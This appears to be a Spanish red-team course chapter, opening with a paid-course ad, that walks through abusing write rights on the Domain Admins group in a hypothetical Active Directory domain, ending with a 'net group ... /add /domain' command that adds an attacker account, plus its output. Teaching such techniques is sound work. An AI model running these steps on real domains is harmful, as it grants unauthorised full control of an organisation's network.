Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!
Contexto
En el contexto de las operaciones de un Red Team, el análisis de los permisos y los roles de los usuarios en un entorno de Active Directory (AD) es crucial para identificar potenciales vectores de ataque y vulnerabilidades. Este capítulo se enfoca en un escenario hipotético donde el usuario "groupwrite.user" en el dominio "SPARTANCYBERSEC" ha sido comprometido. Utilizaremos una salida de PowerShell típica para ilustrar cómo este compromiso podría ser explotado para escalar privilegios o realizar movimientos laterales.
Iniciamos realizando una enumeracion sobre el siguiente grupo:
La linea SPARTANCYBERSEC\groupwrite.user Allow indica que "groupwrite.user" tiene permisos asignados en el grupo "Domain Admins". En un entorno de AD, tener permisos sobre este grupo es significativo, ya que los "Domain Admins" tienen control total sobre el dominio.
Por lo anterior, se procede a suplantar el usuario:
Posteriormente, vamos a validar los miembros del grupo afectado:
PS C:\> net group "domain admins"/domainThe request will be processed at a domain controller for domain spartancybersec.corp.Group name Domain AdminsComment Designated administrators of the domainMembers-------------------------------------------------------------------------------admin Administrator sephirothThe command completed successfully.
Y finalizamos, realizando nuestro ataque con el comando de net:
PS C:\> net group "domain admins" user.hacked /add /domainThe request will be processed at a domain controller for domain spartancybersec.corp.The command completed successfully.
Despues de lo anterior, podemos validar el resultado con el siguiente comando:
PS C:\> net group "domain admins"/domainThe request will be processed at a domain controller for domain spartancybersec.corp.Group name Domain AdminsComment Designated administrators of the domainMembers-------------------------------------------------------------------------------admin Administrator sephirothuser.hackedThe command completed successfully.